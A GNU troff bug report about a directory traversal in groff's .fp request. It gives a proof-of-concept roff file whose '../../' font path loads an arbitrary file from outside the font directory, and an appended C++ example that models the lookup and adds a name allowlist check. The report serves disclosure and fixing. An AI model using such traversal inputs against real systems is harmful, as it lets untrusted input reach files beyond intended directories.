URL:
<https://savannah.gnu.org/bugs/?61424>
Summary: [libgroff] directory traversal in .fp request
Project: GNU troff
Submitted by: gbranden
Submitted on: Thu 04 Nov 2021 09:09:12 AM UTC
Category: Core
Severity: 4 - Important
Item Group: None
Status: In Progress
Privacy: Public
Assigned to: gbranden
Open/Closed: Open
Discussion Lock: Any
Planned Release: None
_______________________________________________________
Details:
Affects groff 1.22.4 and probably goes back a long way.
Setup:
$ cat ~/bogusfont
charset
W 0 0 69
O 0 0 86
R 0 0 73
D 0 0 76
$ cat EXPERIMENTS/hello-dave.roff
.\" This doesn't work...
.\".fp 5 /home/branden/bogusfont
.\" ...but this does.
.fp 5 ../../../../../../../../../../../home/branden/bogusfont
.ft 5
WORD
.pl \n(nlu
Output:
$ nroff EXPERIMENTS/hello-dave.roff
EVIL
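The two .fp arguments from the report, run through a lexical model of the font lookup. This is an added example, not groff's code or its fix. It assumes the font name is appended to a device directory on the font search path; the base directory is a constructed placeholder, and resolve, is_within and font_name_is_safe are hypothetical helpers.

```cpp
// Added example, not groff source. Base directory is a constructed placeholder.
#include <iostream>
#include <sstream>
#include <string>
#include <vector>

// Lexically resolve "base/name": drop empty and "." components, let ".."
// pop one level (never above "/"). Symlinks are ignored here; real code
// should also compare realpath() of the opened file against the base.
std::string resolve(const std::string &base, const std::string &name) {
    std::vector<std::string> parts;
    std::istringstream in(base + "/" + name);
    std::string comp;
    while (std::getline(in, comp, '/')) {
        if (comp.empty() || comp == ".") continue;
        if (comp == "..") { if (!parts.empty()) parts.pop_back(); continue; }
        parts.push_back(comp);
    }
    std::string out;
    for (std::size_t i = 0; i < parts.size(); ++i) out += "/" + parts[i];
    return out.empty() ? "/" : out;
}

// True if `path` is `dir` itself or lies beneath it.
bool is_within(const std::string &dir, const std::string &path) {
    return path.compare(0, dir.size(), dir) == 0 &&
           (path.size() == dir.size() || path[dir.size()] == '/');
}

// Allowlist check for a font name from untrusted input: exactly one path
// component, so it can only name a file inside the device directory.
bool font_name_is_safe(const std::string &name) {
    return !name.empty() && name != "." && name != ".." &&
           name.find('/') == std::string::npos &&
           name.find('\0') == std::string::npos;
}

int main() {
    const std::string base = "/usr/share/groff/font/devutf8";  // constructed
    const char *names[] = {"TR", "/home/branden/bogusfont",
        "../../../../../../../../../../../home/branden/bogusfont"};
    for (const char *n : names) {
        std::string p = resolve(base, n);
        std::cout << n << " -> " << p
                  << (is_within(base, p) ? " [inside]" : " [ESCAPES]")
                  << (font_name_is_safe(n) ? " accept\n" : " reject\n");
    }
}
```

Under this model the absolute name stays inside the device directory (where no such file exists), while the ../ form resolves to the file in the home directory, matching the behaviour shown in the report.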